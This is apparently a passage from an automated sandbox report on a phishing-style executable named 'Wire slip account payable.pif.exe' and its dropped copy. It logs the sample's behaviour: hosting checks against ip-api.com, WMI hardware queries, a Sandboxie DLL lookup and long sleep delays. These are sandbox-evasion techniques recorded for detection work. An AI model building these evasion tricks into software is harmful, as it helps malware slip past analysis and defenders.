                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: Wire slip account payable.pif.exe PID: 1596, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EQVRGq.exe PID: 7560, type: MEMORYSTR
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeMemory allocated: 1550000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeMemory allocated: 2D30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeMemory allocated: 4D30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeMemory allocated: 7D40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeMemory allocated: 8D40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeMemory allocated: 8F00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeMemory allocated: 9F00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeMemory allocated: 1190000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeMemory allocated: 4BE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeMemory allocated: BE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeMemory allocated: 2950000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeMemory allocated: 2780000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeMemory allocated: 71D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeMemory allocated: 81D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeMemory allocated: 8360000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeMemory allocated: 9360000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeMemory allocated: 2E00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeMemory allocated: 3060000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeMemory allocated: 2F80000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 599765Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 599437Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 599328Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 599219Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 599104Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 598981Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 598875Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 598765Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 598656Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 598545Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 598426Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 598297Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 598172Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 598062Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 597953Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 597844Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 597719Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 597609Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 597500Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 597391Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 597281Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 597172Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 597062Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 596951Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 596844Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 596734Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 596625Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 596515Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 596406Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 596297Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 596187Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 596078Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 595968Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 595859Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 595750Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 595641Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 595531Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 595422Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 595312Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 595203Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 595094Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 594963Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 594844Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 594734Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 594625Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 594516Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 599890
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 599781
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 599534
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 599421
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 599312
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 599203
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 599094
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598982
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598875
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598765
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598656
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598546
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598437
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598328
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598218
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598109
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598000
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 597890
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 597781
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 597671
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 597562
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 597453
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 597344
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 597220
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 597109
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 597000
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 596890
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 596781
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 596672
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 596547
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 596437
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 596328
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 596189
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 596078
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 595968
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 595847
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 595734
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 595625
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 595515
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 595406
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 595297
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 595176
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 595047
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 594937
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 594828
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 594718
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 594609
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 594500
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 594390
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8937Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 462Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9264Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeWindow / User API: threadDelayed 3184Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeWindow / User API: threadDelayed 6670Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeWindow / User API: threadDelayed 1455
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeWindow / User API: threadDelayed 8390
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 2688Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep count: 8937 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7544Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316Thread sleep count: 462 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7536Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep count: 34 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7720Thread sleep count: 3184 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -599875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -599765s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7720Thread sleep count: 6670 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -599656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -599547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -599437s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -599328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -599219s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -599104s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -598981s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -598875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -598765s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -598656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -598545s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -598426s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -598297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -598172s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -598062s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -597953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -597844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -597719s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -597609s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -597500s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -597391s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -597281s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -597172s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -597062s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -596951s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -596844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -596734s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -596625s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -596515s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -596406s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -596297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -596187s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -596078s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -595968s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -595859s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -595750s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -595641s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -595531s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -595422s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -595312s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -595203s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -595094s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -594963s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -594844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -594734s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -594625s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688Thread sleep time: -594516s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7588Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep count: 32 > 30
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -29514790517935264s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 8004Thread sleep count: 1455 > 30
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -599890s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 8004Thread sleep count: 8390 > 30
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -599781s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -599534s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -599421s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -599312s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -599203s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -599094s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -598982s >= -30000s
